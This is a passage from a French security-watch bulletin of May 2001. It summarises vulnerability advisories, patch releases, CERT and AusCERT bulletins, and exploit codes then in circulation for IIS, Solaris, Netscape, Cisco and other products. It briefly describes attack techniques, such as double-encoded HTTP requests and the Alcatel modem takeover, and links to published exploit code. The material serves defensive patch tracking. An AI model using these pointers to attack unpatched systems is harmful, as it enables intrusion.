de service sur IIS 5.0.
Forte
17/05 Microsoft Internet Information Server 5.0 ('httpext.dll' versions inférieures à 0.9.3940.21)
Mauvaise gestion des requêtes 'WebDav'
Correctif existant Méthode 'LOCK'
http://www.securityfocus.com/archive/1/185074
[def-2001-26]
Déni de service sur les contrôleurs de domaine W2K
Une erreur de codage dans le service de gestion des domaines peut être mise à profit pour rendre indisponible les
contrôleurs de domaines Windows 2000
Forte
08/05 Windows 2000 Server, Advanced Server et DataCenter Server
Libération de la mémoire
Correctif existant Gestion des domaines
MS01-024
Page 28/45
Mai 2001
NETSCAPE
Débordement de buffer dans 'Netscape Enterprise'
Un débordement de buffer affecte à distance la fonctionnalité 'Web Publisher' de Netscape Enterprise 4.1.
Critique 15/05 Netscape Enterprise 4.1 et versions inférieures
Correctif existant Fonction 'Web Publisher' ()
AD20010515
Déni de service dans 'Netscape Enterprise Server'
Il est possible de provoquer à distance un déni de service sur 'Netscape Enterprise Server' en soumettant une
méthode ou requête invalide via le protocole HTTP.
Moyenne 19/05 Netscape Enterprise Server 4 (SP3, SP7) sur Windows NT/2000
Mauvaise gestion des méthodes invalides
Correctif existant Méthode ou requête HTTP
Bugtraq
NIPC
Recrudescence d'attaques envers les serveurs Américains
Le NIPC publie, sous la référence 01-009, un avis d'alerte au sujet d'une possible recrudescence d'attaques envers
les sites web et serveurs de mails Américains par la Chine.
Critique
26/04 Toute plate-forme Linux utilisant une version BIND 8.2,8.2-P1, 8.2.1, 8.2.2-Px, toutes les version 8.2.3 beta.
Forte activité et propagation du virus
Correctif existant Attaques par le ver 'lion'
http://www.nipc.gov/warnings/advisories/2001/01-009.htm
NIPC 01-009
Tentatives de déni de service via le port 80 (HTTP)
Le NIPC informe qu'un grand nombre de site a été victime d'un déni de service distribué (DDos) contre l'accès web.
Moyenne 05/05 Système utilisant le port 80 (HTTP)
Redirection datagrammes UDP
Surcharge du port 80 (HTTP)
Aucun correctif
NIPC 01-012
ORACLE
Vulnérabilité dans la suite 'Oracle E-Business'
La présence d'un fichier (bibliothèque 'DLL') utilisée à des fins de déboguage permet à un utilisateur de lire le mot
de passe utilisé dans la suite 'Oracle E-Business'.
Forte
22/05 Oracle E-Business Suite version 11i ADI (ApplicationsDesktop Integrator)
Bibliothèque utilisée à des fins de déboguage
Correctif existant Fichier 'FNDPUB11I.DLL'
http://metalink.oracle.com/
BugTraq
ROBTEX
Vulnérabilité '..' dans le serveur WEB Viking
Une erreur dans le traitement des URL autorise la visualisation de l'arborescence en dehors de la racine logique du
serveur.
Forte
25/04 Viking versions antérieures à 1.7-381
Gestion des URL relatives
Correctif existant Serveur HTTP
http://emc2k.com/dhcorp/homebrew/viking.zip
DHC via Bugtraq
SGI
Débordement de buffer dans le service 'rpc.espd'
Un débordement de buffer présent dans le service 'rpc.espd' peut être exploité à distance pour acquérir les
privilèges de 'root'
Critique 09/05 IRIX 6.5.5 à 6.5.8 (les systèmes 6.5.7 et 6.5.8 dotés du correctif 4123 ne sont pas vulnérables).
Correctif existant Service 'rpc.espd'
http://www.sgi.com/support/security/advisories.html
SGI
http://xforce.iss.net/alerts/advise76.php
X-Force
SUN
Débordement de buffer dans 'yppasswd'
Un débordement de buffer dans le service 'yppasswd' permet à un utilisateur distant d'obtenir un accès 'root' via le
port TCP 77.
Critique
10/05 Sun Solaris 6 et 7 (architecture SPARC)
Service 'yppasswd'
Palliatif proposé
http://www.incidents.org/news/yppassword.php
SANS Incidents
Page 29/45
Mai 2001
Vulnérabilité dans les appels 'syscall' sur Intel
Une vulnérabilité, ne touchant que les architectures Intel, affecte les appels 'syscall' et autorisent un utilisateur à
accéder à certaines zones mémoire du noyau.
Forte
16/05 Solaris 8, 7 et 2.6 (SunOS 5.8_x86, 5.7_x86, and 5.6_x86), Trusted Solaris 8 et 7 sur archirecture Intel
Accès à des privilèges plus élevés
Correctif existant Arguments des appels 'syscall'
http://sunsolve.sun.com/pub-cgi/secBulletin.pl
Sun #00202
SYMANTEC
Accès distant à la base de configuration 'NetProwler'
La base MySQL locale contenant la configuration et diverses informations sensibles est accessible depuis le réseau
local
Forte
08/05 NetProwler 3.5.x en environnement NT
Accès réseau TCP/IP et SMB activés
Correctif existant MySQL 3.22.24
http://www2.axent.com/swat/index.cfm?Doc=2001_05_08
Symantec
eEYE
Multiples vulnérabilités dans 'SecureIIS'
De multiples vulnérabilités affectent le produit 'SecureIIS' de eEye. Elles sont majoritairement dues à l'utilisation de
caractères d'échappement dans les requêtes HTTP.
Forte
18/05 SecureIIS versions 1.0.2 et inférieures
Contournement des règles de filtrage
Correctif existant Caractères d'échappement
ASLabs-2001-01
ALERTES NON CONFIRMEES
Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes
d’information mais n’ont pas encore fait l’objet d’une annonce ou d'un correctif de la part de l'éditeur. Ces
alertes nécessitent la mise en place d’un processus de suivi et d’observation.
3COM
Vulnérabilité dans les routeurs 'OfficeConnect DSL'
Une vulnérabilité dans les routeurs 'OfficeConnect DSL' permet à un utilisateur distance de provoquer un déni de
service via une simple requête HTTP.
Forte
15/05 Routeur 3COM OfficeConnect 812
Requête HTTP
Mauvais traitement des requêtes malformées
Aucun correctif
Bugtraq
ALADDIN
Contournement des mécanismes de filtrage dans 'eSafe'
Les mécanismes de filtrage de 'eSafe Gateway' sont contournables, laissant la possibilité, à un utilisateur distant,
d'exécuter du code sur la machine vulnérable.
Forte
20/05 eSafe Gateway 3.0
Filtrage de scripts
Contournement des mécanismes de filtrage
Aucun correctif
Bugtraq
CISCO
Déni de service via le protocole 'HSRP'
Il est possible de provoquer un déni de service sur le segment de réseau sur lequel transite le protocole 'HSRP'.
Critique 04/05 Systèmes utilisant le protocole 'HSRP'
Protocole 'HSRP'
Création insécurisée de paquets 'HSRP'
Palliatif proposé
Bugtraq
CMAIL
Déni de service dans 'CMAIL'
Il est possible de provoquer un déni de service dans 'CMAIL', à distance, par débordement de buffer dans la
commande 'HELO'.
Forte
18/05 CMail version 2.4.9
Commande 'HELO'
Aucun correctif
http://www.securiteam.com/windowsntfocus/5UP0B204AY.html
Securiteam
Page 30/45
Mai 2001
MCAFEE
Déni de service dans l'agent 'Remote Desktop'
Un port positionné en émission de données permet à un utilisateur distant de provoquer un déni de service dans
l'agent 'Remote Desktop'.
Moyenne 16/05 McAfee Remote Desktop 3.0 et inférieurs
Agent 'Remote Desktop'
Envoi de données vers le port utilisé en émission
Aucun correctif
Bugtraq
MICROSOFT
Scripting XML dans IE et Outlook Express
Un code Active Scripting peut être exécuté indépendamment des options d'autorisation positionnées dans les zones
de sécurité.
Critique 20/04 Internet Explorer 5.xOutlook Express
WHS - Windows Host Scripting
Court-circuit de l'option 'Active Scripting'
Aucun correctif
http://www.guninski.com/iexslt.html
Guninski #43
Déni de service sur 'IIS 5.0' via 'PROPFIND'
Il est possible de provoquer à distance un déni de service sur 'IIS 5.0' lorsque les extensions WEBDAV sont
activées.
Moyenne 06/05 Microsoft Internet Information Services 5.0
Requête PROPFIND
Aucun correctif
http://www.guninski.com/iispropover2.html
Guninski #44
Déni de service d'accès web anonyme sur 'IIS'
Il est possible de bloquer à distance le compte utilisateur utilisé par le serveur IIS afin d'empêcher l'accès aux
pages web.
Moyenne 23/04 IIS 4.0 sous Windows NT 4.0IIS 5.0 sous Windows 2000
Règles de blocages de compte
Blocage du compte utilisateur IUSR_ XXXXX
Aucun correctif
http://www.securiteam.com/windowsntfocus/IIS_DoS_attack__Anonymous_lockout_.html
Securiteam
NOVELL
Débordement de buffer dans le serveur mail MERCURY
Un débordement de buffer présent dans le service 'APOP' du serveur de messagerie 'MERCURY for NETWARE' peut
être exploité pour provoquer un déni de service
Forte
23/04 Mercury for Netware versions antérieures à 1.48
Correctif existant Service APOP
http://www.securiteam.com/securitynews/Mercury_for_NetWare_POP3_Server_Vulnerable_to_a_Remote_Bu
Securiteam
ffer_Overflow__APOP_.html
Déni de Service sur BorderWare VPN
Un déni de service exploitable à distance permet d'arrêter le service BorderWare VPN.
Forte
20/04 BorderWare VPN 3.5 (confirmé) et BorderWare VPN 3.0-3.6 (probable)
Service VPN
Attaque de type SYN Flood
Aucun correctif
http://www.securityfocus.com/vdb/bottom.html?vid=2623
Bugtraq
VMWare
Vulnérabilité dans l'utilitaire 'vmware-mount'
L'utilitaire 'vmware-mount' peut être utilisé, dans certaines conditions, pour écraser un quelconque fichier du
système et provoquer un déni de service
Moyenne 25/04 Version non documentée, a priori, VMWare V 2.0.3
Script 'vmware-mount.pl'
Gestion des fichiers temporaires
Aucun correctif
http://www.securiteam.com/unixfocus/VMware_Symlink_Problems__DoS__Exploit_.html
Securiteam
AUTRES INFORMATIONS
REPRISES D'AVIS
ET
CORRECTIFS
Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont
données lieu à la fourniture d'un correctif:
ALLAIRE
Reprise de l'avis Microsoft MS01-004
Allaire a repris, sous la référence CSB01-02, le bulletin Microsoft MS01-004 portant sur l'accès en lecture à certains
fichiers via l'utilisation de l'extension '.htr'
http://www.allaire.com/handlers/index.cfm?ID=21042&Method=Full
Page 31/45
Mai 2001
Allaire a repris, sous la référence CSB01-03, le bulletin Microsoft MS01-014 concernant un déni de service pouvant
être provoqué à distance contre IIS 5.0 et Exchange 2000 .
Allaire a repris, sous la référence CSB01-05, le bulletin Microsoft MS01-023 portant sur le débordement de buffer
exploitable à distance présent dans le filtre '.printer' de l'extension ISAPI .
Reprise de l'avis @Stake portant sur IPlanet Web 4.x
Allaire a repris, sous la référence CSB01-04, l'avis émis par @Stake portant sur l'accès distant à des informations
sensibles gérées par un serveur IPlanet WEB 4.x .
Informations sur le bulletin Microsoft MS01-026
Allaire publie, sous la référence CSB01-07, un bulletin traitant de l'avis Microsoft MS01-026 au sujet d'une
vulnérabilité dans le décodage des requêtes HTTP et affectant les serveurs IIS 4.0 et 5.0. Allaire signale aux
utilisateurs que ces vulnérabilités risquent potentiellement d'affecter 'ColdFusion' et 'JRun', pouvant entraîner
l'exécution de code à distance.
Informations sur les vulnérabilités affectant 'iPlanet'
Allaire publie, sous la référence CSB01-06, une note information au sujet de deux failles découvertes sur les
serveurs web iPlanet 4.1. Les fonctionnalités 'Web Publisher' sur 'Netscape Enterprise' sont à l'origine d'une des
vulnérabilités.
AUSCERT
L'AusCERT a repris, sous la référence AL-2001.07, le bulletin Microsoft MS01-023 au sujet d'un débordement de
buffer exploitable à distance et affectant le filtre '.printer' de l'extension ISAPI .
ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.07
CERT
Complément d'informations au sujet du bulletin MS01-026
Le CERT publie, sous la référence CA-2001-12, un bulletin d'alerte au sujet de la vulnérabilité présente dans
l'encodage des requêtes HTTP, discutée dans le bulletin Microsoft MS01-026. Un double encodage des caractères
spéciaux (RFC 2396) permet en effet de contourner le mécanisme de vérification des requêtes. Celui-ci devenant
inopérant, il est possible de spécifier un chemin en dehors de la racine web afin d'accéder à des fichiers ou
commandes normalement interdits. Voir aussi le bulletin émis par ISS (X-Force).
http://xforce.iss.net/alerts/advise77.php
Alerte relative au bulletin Microsoft MS01-023
Le CERT et le FedCIRC publient, sous les références CA-2001-10 et FA-2001-10, un bulletin d'alerte relatif à l'avis
Microsoft MS01-023 traitant du débordement de buffer affectant l'extension ISAPI d'IIS 5.0. Un utilisateur peut
exploiter cette vulnérabilité afin d'exécuter du code distant sur la machine cible. Le NIPC publie aussi un bulletin
sous la référence 01-011.
CIAC
Le CIAC a repris, sous la référence L-074, l'avis Microsoft MS01-022 'WebDAV Service Provider Can Allow Scripts to
Levy Requests as User'. Il est possible de provoquer l'exécution de scripts à destination du composant 'WebDAV
Service Provider' afin d'accéder aux ressources 'WebDAV'.
Reprise de l'avis Cisco CSCdt79947
Le CIAC a repris, sous la référence L-082, l'avis Cisco CSCdt79947 traitant d'une vulnérabilité dans la gestion de
l'un des attributs NLRI (Network Layer Reachability Information) qui induit un dysfonctionnement aléatoire de
l'équipement voire un déni de service.
Reprise de l'avis FreeBSD-SA-01:32
Le CIAC a repris, sous la référence L-075, l'avis FreeBSD SA-01:32 (Révisé) 'IPFilter may incorrectly pass packets'.
Il est possible de passer un fragment IP, sous certaines conditions, en contournant les règles de filtrage mises en
place.
Page 32/45
Mai 2001
Reprise de l'avis Red Hat RHSA-2001:047-03
Le CIAC a repris, sous la référence L-076, l'avis RedHat RHSA-2001:047-03 'Linux kernel 2.2.19 now available'.
Cette nouvelle version du noyau corrige de nombreux problèmes de sécurité et intègre NFS V3.
Le CIAC a repris, sous la référence L-083, l'avis Microsoft MS01-026 traitant de plusieurs vulnérabilités dans IIS 4.0
et 5.0. Un encodage superflu des requêtes HTTP permet de contourner le processus de filtrage, autorisant un
utilisateur distant à sortir de la racine web et d'exécuter du code sous les droits de 'IUSR_'.
Reprise de l'avis Red Hat RHSA-2001:044-08
Le CIAC a repris, sous la référence L-084, l'avis Red Hat RHSA-2001:044-08 traitant d'une vulnérabilité autorisant
un utilisateur local à créer un lien symbolique dans le répertoire '/tmp' afin de corrompre certains fichiers suite à
une requête d'impression.
Reprise de l'avis Cisco CSCdt64682
Le CIAC a repris, sous la référence L-085, l'avis Cisco CSCdt64682 traitant d'un défaut de permissions sur les
commutateurs CSS 11000 autorisant un utilisateur distant, pouvant établir une connexion FTP valide, à accéder à la
totalité des fichiers présents sur le système.
Reprise de l'avis Cisco 'CBOS-multiple2-pub'
Le CIAC a repris, sous la référence L-086, les avis Cisco CSCds16078, CSCds30150, CSCdt04882 et CSCds74567,
regroupés dans un même bulletin CBOS-multiple2-pub. Plusieurs vulnérabilités affectent CBOS sur la famille des
routeurs Cisco 600 et peuvent mener un utilisateur à provoquer un déni de service, acquérir des informations
sensibles ou compromettre les connexions TCP.
Le CIAC a repris, sous la référence L-078, l'avis Microsoft MS01-023 au sujet d'un débordement de buffer affectant
l'extension ISAPI sous IIS 5.0. Un utilisateur peut exploiter cette vulnérabilité afin d'exécuter du code distant sur la
machine cible.
Le CIAC a repris, sous la référence L-073, l'avis Microsoft MS01-021 'Invalid Web Request Can Cause Access
Violation in ISA Server Web Proxy Service'. Le service 'Web Proxy' d'un serveur ISA (Internet Security and
Acceleration) est vulnérable à distance à une attaque de type déni de service.
Le CIAC a repris, sous la référence L-079, le bulletin Microsoft MS01-024 traitant d'un déni de service sur les
contrôleurs de domaine Windows 2000. Il est possible de saturer la mémoire du système en soumettant une
multitude de requêtes mal formatées.
Reprise de l'avis SGI 20010501-01-P
Le CIAC a repris, sous la référence L-080, l'avis SGI 20010501-01-P au sujet d'un débordement de buffer dans le
service 'rpc.espd'. Il est possible d'exploiter la vulnérabilité à distance afin d'exécuter une commande quelconque et
acquérir ainsi les privilèges de 'root'.
Le CIAC a repris, sous la référence L-081, le bulletin Microsoft MS01-025 au sujet de deux vulnérabilités,
exploitables à distance, liées au service d'indexation de Windows 2000, Index Server 2.0. Il est possible d'exécuter
des commandes non sollicitées sur le serveur et d'acquérir un fichier quelconque.
Révision de l'avis L-70 portant sur 'ftp'
Une référence à l'avis FreeBSD FreeBSD-SA-01:33 a été rajoutée à l'avis CIAC L-70 portant sur le service 'ftp'. Une
vulnérabilité de type débordement de buffer peut être activée lors de l'expansion des noms de fichiers.
Page 33/45
Mai 2001
COMPAQ
Disponibilité des correctifs pour 'xntp'
Compaq annonce la disponibilité des correctifs pour 'xntp' pour les systèmes Tru64 UNIX versions 4.0d, 4.0f, 4.0g,
5.0, 5.0a et 5.1. Une vulnérabilité dans le démon permet à un utilisateur distant de provoquer un déni de service,
voire à obtenir un interpréteur de commande 'root' distant grâce à un débordement de buffer.
http://ftp.support.compaq.com/patches/public/Readmes/unix/duv40d16-c0058302-10580-20010430.README
http://ftp.support.compaq.com/patches/public/Readmes/unix/duv40f16-c0042002-10579-20010430.README
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v40g16-c0003502-10577-20010430.README
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v5016-c0006102-10575-20010430.README
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v50a16-c0010402-10574-20010430.README
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v513-c0027202-10573-20010430.README
FREEBSD
Disponibilité de plusieurs correctifs
FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
hylafax
FreeBSD-SA-01:34
licq
FreeBSD-SA-01:35
samba
FreeBSD-SA-01:36
slrn
FreeBSD-SA-01:37
sudo
FreeBSD-SA-01:38
TCP Kernel
FreeBSD-SA-01:39
http://www.linuxsecurity.com/advisories/
LINUX DEBIAN
Disponibilité de nombreux correctifs
Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
zope
DSA-043-2
samba
DSA-048-3
netscape
DSA-051-1
sendfile
DSA-052-1
nedit
DSA-053-1
cron
DSA-054-1
zope
DSA-055-1
mandb
DSA-056-1
gftp
DSA-057-1
http://lists.debian.org/debian-security-announce-01
LINUX MANDRAKE
Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
openssh
MDKSA-2001:033-2
7.1 / 7.2 / CS1.0.1 / 8.0
samba
MDKSA-2001:040-1
7.1 / 7.2 / CS1.0.1 / 8.0
hylafax
MDKSA-2001:041
7.1 / 7.2 / CS1.0.1
nedit
MDKSA-2001:042
7.1 / 7.2 / CS1.0.1 / 8.0
rpmdrake
MDKSA-2001:043
8.0
gftp
MDKSA-2001:044
7.1 / 7.2 / CS1.0.1 / 8.0
gnupg
MDKSA-2001:045
8.0
kdelibs
MDKSA-2001:046
7.1 / 7.2 / CS1.0.1 / 8.0
pine
MDKSA-2001:047-1
7.1 / 7.2 / CS1.0.1 / 8.0
cups
MDKSA-2001:048
7.2
/ 8.0
zope
MDKSA-2001:049
7.1 / 7.2 / CS1.0.1
vixie-cron
MDKSA-2001:050
7.1 / 7.2 / CS1.0.1 / 8.0
http://www.linux-mandrake.com/en/security/2001
Page 34/45
Mai 2001
LINUX REDHAT
RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
samba
RHSA-2001:044-08
6.2 / 7.1
mgetty
RHSA-2001:050-04
6.2 / 7.x
iptables
RHSA-2001:052-02
7.1
gftp
RHSA-2001:053-06
6.2 / 7.1
mounts
RHSA-2001:058-04
7.1
kdelibs
RHSA-2001:059-03
7.1
kerberos
RHSA-2001:060-04
6.2 / 7.x
nedit
RHSA-2001:061-02
5.2 / 6.2 / 7.x
gnupg
RHSA-2001:063-02
6.2 / 7.x
zope
RHSA-2001:065-05
6.2 / 7.x
minicom
RHSA-2001:067-03
5.2 / 6.2 / 7.x
man
RHSA-2001:069-02
6.2 / 7.0
mktmp
RHSA-2001:070-02
5.2 / 6.2
http://www.linuxsecurity.com/advisories/
MICROSOFT
Disponibilité du Service Pack 2 (SP2) pour Windows 2000
Microsoft annonce la disponibilité du Service Pack 2 (SP2) pour le système d'exploitation Windows 2000. Les 46
correctifs qui le constituent permettent de fiabiliser le système, d'assurer la compatibilité entre applications ainsi
que de résoudre les problèmes de sécurité et de configuration.
http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/default.asp
http://www.microsoft.com/technet/security/w2ksp2.asp
http://www.microsoft.com/Windows2000/server/evaluation/news/bulletins/128bit.asp
Microsoft infecte ses clients du virus 'Fun_Love'
Microsoft a reconnu que 26 sociétés, abonnées au support Gold et Premier, ont été infectées par le virus
'Fun_Love'. Ce dernier est particulièrement difficile à éradiquer car il se propage sur les disques partagés via le
réseau Microsoft. Windows NT ainsi que Windows 95, 98 et Me seraient les cibles potentielles du virus. Cependant,
Microsoft affirme que seuls 170 fichiers infectés auraient été téléchargés par les clients.
http://www.zdnet.co.uk/news/2001/16/ns-22474.html
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_FUNLOVE.4099
Mise à jour de l'avis MS01-015 portant sur IE 5.x
Microsoft publie une mise à jour de son avis MS01-015 'IE can Divulge Location of Cached Content' . Une régression
a été découverte dans le correctif 'Windows Script Host' référencé dans la version originale de l'avis. Il est en
conséquence conseillé d'appliquer immédiatement la nouvelle version disponible sur le site Microsoft.
Windows Host Scripting 5.1: http://www.microsoft.com/msdownload/vbscript/scripting51.asp
Windows Host Scripting 5.5: http://www.microsoft.com/msdownload/vbscript/scripting.asp
http://www.microsoft.com/technet/security/bulletin/ms01-015.asp
Mise à jour de l'avis MS00-035 'SQL 7.0 Password'
Microsoft publie une mise à jour de l'avis MS00-035 'SQL Server 7.0 Service Pack Password Vulnerability' pour
annoncer la disponibilité d'un correctif applicable au Service Pack 3 de SQL 7.0. Les versions antérieures de l'avis
portaient sur le correctif lié aux Services Packs 1 et 2 de SQL
http://www.microsoft.com/technet/security/bulletin/MS00-035.asp.
OpenBSD
Disponibilité des correctifs pour 'ftpd'
OpenBSD annonce la disponibilité des correctifs contre la vulnérabilité affectant le démon ftp 'ftpd' permettant de
provoquer à distance un débordement de buffer au travers de la fonction 'glob()'.
http://www.openbsd.org/errata28.html#glob_limit
Disponibilité des correctifs pour 'ipf'
OpenBSD annonce la disponibilité des correctifs pour 'ipf'. Un utilisateur distant peut être autorisé à passer un
paquet au travers des filtres.
http://www.openbsd.org/errata28.html#ipf_frag
OpenSSL
Nouvelle version 'OpenSSL 0.9.6a'
OpenSSL.org annonce la version 0.9.6a d'OpenSSL. Les changements les plus importants résident dans la
correction de failles potentielles, comme l'utilisation sécurisée des variables d'environnement lorsque OpenSSL
fonctionne sous l'autorité de 'root', la vérification du résultat RSA-CRT ou encore la prévention d'attaques.
http://www.openssl.org/news/announce.htmlhttp://www.openssl.org/source/
Page 35/45
Mai 2001
SAMBA
Disponibilité d'une révision 2.0.9 stable et finale
La révision 2.0.8 de 'samba' ne corrige pas le problème de lien symbolique apparu dans la révision 2.0.7 comme
annoncé par l'équipe de développement. Celle-ci a donc diffusé la révision 2.0.9 en annonçant qu'il s'agissait de la
dernière mise à jour de samba version 2.0. Le passage à la version 2.2, immune et maintenue, est fortement
recommandé. Les éditeurs LINUX vont, a l'instar de DEBIAN, annoncer la disponibilité d'un correctif 2.0.9.
http://fr.samba.org/samba/samba.html
CODES D'EXPLOITATION
Les codes d'exploitation des vulnérabilités suivantes ont fait l'objet d'une large diffusion:
ALCATEL
Technique d'attaque exploitant l'accès 'EXPERT'
Une technique d'attaque exploitant l'accès 'EXPERT' des modems ADSL ALCATEL est détaillée dans la liste bugtraq.
En pratique, cette technique tire parti des fonctionnalités de translation d'adresses (NAT) et de ports (PAT) offertes
par le routeur intégré au modem. La mise en pratique suppose cependant que l'interface IP du routeur puisse être
atteinte depuis Internet pour en prendre le contrôle. L'attaquant peut alors reconfigurer le routeur pour assurer la
translation des requêtes externes dans le plan d'adressage privé se faisant ainsi passer pour un système interne.
HYLAFAX
Code d'exploitation de la vulnérabilité 'syslog'
Un code exploitant la vulnérabilité liée à l'option '-q' (activation de la fonction 'syslog') du service 'hfaxd' a été
diffusé sur le site 'digit-labs'. Il est en conséquence fortement recommandé d'assurer la mise à jour de ce service.
http://www.digit-labs.org/files/formatstrings/hfaxd-fs-exploit.pl.txt
Microsoft
Codes d'exploitation pour la vulnérabilité IIS
Plusieurs codes d'exploitation (écrits en langage C et en Perl) concernant la récente vulnérabilité des serveurs IIS
4.0 et 5.0, ont été diffusés sur la liste Bugtraq. Il est impératif d'appliquer les correctifs fourni dans l'avis Microsoft
MS01-026.
http://www.securityfocus.com/archive/1/184795http://www.securityfocus.com/archive/1/184822
Code d'exploitation pour 'IIS 5.0' (IPP/ISAPI)
Securiteam publie un code exploitant la vulnérabilité de type débordement de buffer sous Microsoft Windows 2000
et IIS 5.0. (filtre '.printer' de la bibliothèque ISAPI pour le protocole IPP). Il permet d'exécuter du code sur la
machine distante.
http://www.securiteam.com/exploits/IIS_5_0___printer__Exploit_Code_Released.html
Nouveau code d'exploitation '.printer' sous IIS 5.0
Securiteam publie un nouveau code exploitant le débordement de buffer présent dans le filtre '.printer' de la
bibliothèque ISAPI sous IIS 5.0 . Dénommé 'IISHACK2000', ce code automatise l'ouverture d'une session
interactive sur la machine cible. En pratique, ce code résulte du simple portage du code écrit en 'C' et diffusé il y a
quelques jours.
http://www.securiteam.com/exploits/5TP0C004AS.html
BULLETINS ET NOTES
Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les
éditeurs:
ATTAQUES
Recrudescence des attaques envers 'IIS' et 'sunrpc'
L'AusCERT informe qu'un grand nombre d'attaques (probablement dues au nouveau ver 'sadmind/IIS') a été
recensé contre Microsoft Internet Information Server (IIS) et les services Sun portmapper (sunrpc). Le bug
'unicode' serait exploité afin de compromettre les systèmes 'IIS' tandis que le port 111 le serait sous les systèmes
Sun. Cette information est similaire à l'alerte CERT CA-2001-11 .
Page 36/45
Mai 2001
AusCERT
Récapitulatif des bulletins Microsoft IIS 4.0 et 5.0
L'AusCERT publie, sous la référence AA-2001.02, un récapitulatif exhaustif et ordonné de tous les correctifs
concernant Microsoft IIS. Construit sur quatre sections, il recense et résume en quelques lignes les bulletins
suivants
:
1. Correctifs pour IIS 4.0 sur Windows NT 4 SP6a
MS98-004 - Unauthorized ODBC Data Access with RDS and IIS
MS99-025 - Unauthorized Access to IIS Servers Through ODBC Data Access with RDS
MS00-018 - Patch Available for "Chunked Encoding Post" Vulnerability
MS00-063 - Patch Available for "Invalid URL" Vulnerability
MS99-039 - Patch Available for "Domain Resolution" and "FTP Download" Vulnerabilities
MS99-058 - Patch Available for "Virtual Directory Naming" Vulnerability
MS00-006 - Patch Available for "Malformed Hit-Highlighting Argument" Vulnerability
MS00-028 - Procedure Available to Eliminate "Server-Side Image Map Components" Vulnerability
MS99-053 - Patch Available for Windows "Multithreaded SSL ISAPI Filter" Vulnerability
MS99-061 - Patch Available for "Escape Character Parsing" Vulnerability
MS00-025 - Procedure Available to Eliminate "Link View Server-Side Component" Vulnerability
2. Correctifs pour IIS 5.0 sur Windows 2000 SP1
MS01-023 - Unchecked Buffer in ISAPI Extension Could Enable Compromise of IIS 5.0 Server
MS01-014 - Malformed URL can Cause Service Failure in IIS 5.0 and Exchange 2000
MS01-016 - Malformed WebDAV Request Can Cause IIS to Exhaust CPU Resources
3. Correctifs pour ISS 4.0 et IIS 5.0
MS00-030 - Patch Available for "Malformed Extension Data in URL" Vulnerability
MS00-078 - Patch Available for "Web Server Folder Traversal" Vulnerability
MS00-086 - Patch Available for "Web Server File Request Parsing" Vulnerability
MS00-023 - Patch Available for "Myriad Escaped Characters" Vulnerability
MS00-031 - Patch Available for "Undelimited .HTR Request" & "File Fragment Reading via .HTR" Vulnerabilities
MS00-044 - Patch Available for "Absent Directory Browser Argument" Vulnerability
MS01-004 - Malformed .HTR Request Allows Reading of File Fragments
MS00-060 - Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
MS00-084 - Patch Available for "Indexing Services Cross Site Scripting" Vulnerability
MS00-100 - Patch Available for "Malformed Web Form Submission" Vulnerability
MS00-019 - Patch Available for "Virtualized UNC Share" Vulnerability
MS00-057 - Patch Available for "File Permission Canonicalization" Vulnerability
MS00-080 - Patch Available for "Session ID Cookie Marking" Vulnerability
La section 4. contient une liste d'URLs pointant sur les outils et checklist pour IIS.
Ce bulletin est sans doute publié à la suite des récentes attaques qu'ont connus les systèmes sous IIS 4.0 ou 5.0.
Ajoutons que l'alerte fait aussi état du bulletin MS01-026 même si celui-ci n'est pas recensé dans la liste.
ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2001.02
Note d'information sur le virus 'Homepage'
L'AusCERT publie, sous la référence AL-2001.09, un bulletin d'alerte au sujet du virus baptisé 'Homepage'. Il se
présente sous la forme d'un script vbs et se propageant par e-mail.
AXENT/SYMANTEC
Nouvelles règles de détection pour 'NetProwler 3.5x'
Les nouvelles règles de détection pour 'NetProwler 3.5x SU4' permettent de notifier les agents 'Intruder Alert' via
les trap SNMP. Cette fonctionnalité permet de contrôler à la fois 'NetProwler' et 'Intruder Alert' depuis une même
machine centrale.
CERT
Note d'information sur l'outil de DDoS 'Carko'
Le CERT publie, sous la référence IN-2001-04, un bulletin d'information au sujet de l'outil de déni de service
distribué 'Carko'. Cette note sensibilise l'utilisateur en qualifiant de forts les risques encourus. Les liens vers les
bulletins CA-2001-05 et VU#648304 y sont rappelés. Notons que Sun reste silencieux quant à la disponibilité de
correctifs pour le démon 'snmpXdmid', dont la vulnérabilité est exploitée par 'Carko'.
http://www.cert.org/incident_notes/IN-2001-04.html
Publications des statistiques du CERT de 1988 à 2001
Le CERT publie les statistiques reflétant la croissance du nombre de vulnérabilités au niveau de la sécurité
informatique. A titre d'exemple, le tableau des incidents reportés en révèle 21756 pour l'an 2000, 7047 pour le
premier trimestre 2001, pour un total de 54,758 incidents sur les quatorze années que compte le CERT.
http://www.cert.org/stats/cert_stats.html
Page 37/45
Mai 2001
CISCO
Création d'une section d'informations sur la sécurité
Cisco propose une nouvelle section intitulée 'Security Notices' ayant pour but d'informer les utilisateurs des
problèmes de sécurité faisant l'objet de bulletins à venir. Cette section contient aussi les problèmes liés aux
mauvaises configurations pouvant entraîner la compromission des systèmes. Les liens externes fournis pointent sur
la description du problème ainsi que la réponse du service technique Cisco.
http://www.cisco.com/warp/public/707/notices.html
COMPAQ
Disponibilité du kit 'ITSEC Certification'
Compaq annonce la disponibilité du kit (sous forme de correctif) 'ITSEC Certification' pour Tru64 UNIX version 4.0G.
Ce kit permet d'obtenir une version 'ITSEC' certifiée. Cette configuration est utilisée par les utilisateurs ayant besoin
d'une réplique exacte des environnements sous lesquels la certification 'ITSEC E2' est nécessaire.
http://ftp.support.compaq.com/patches/public/Readmes/unix/itsec_cert_kit_t64v40g_releasenotes.README
ECommerce
Publication des résultats d'une étude Française
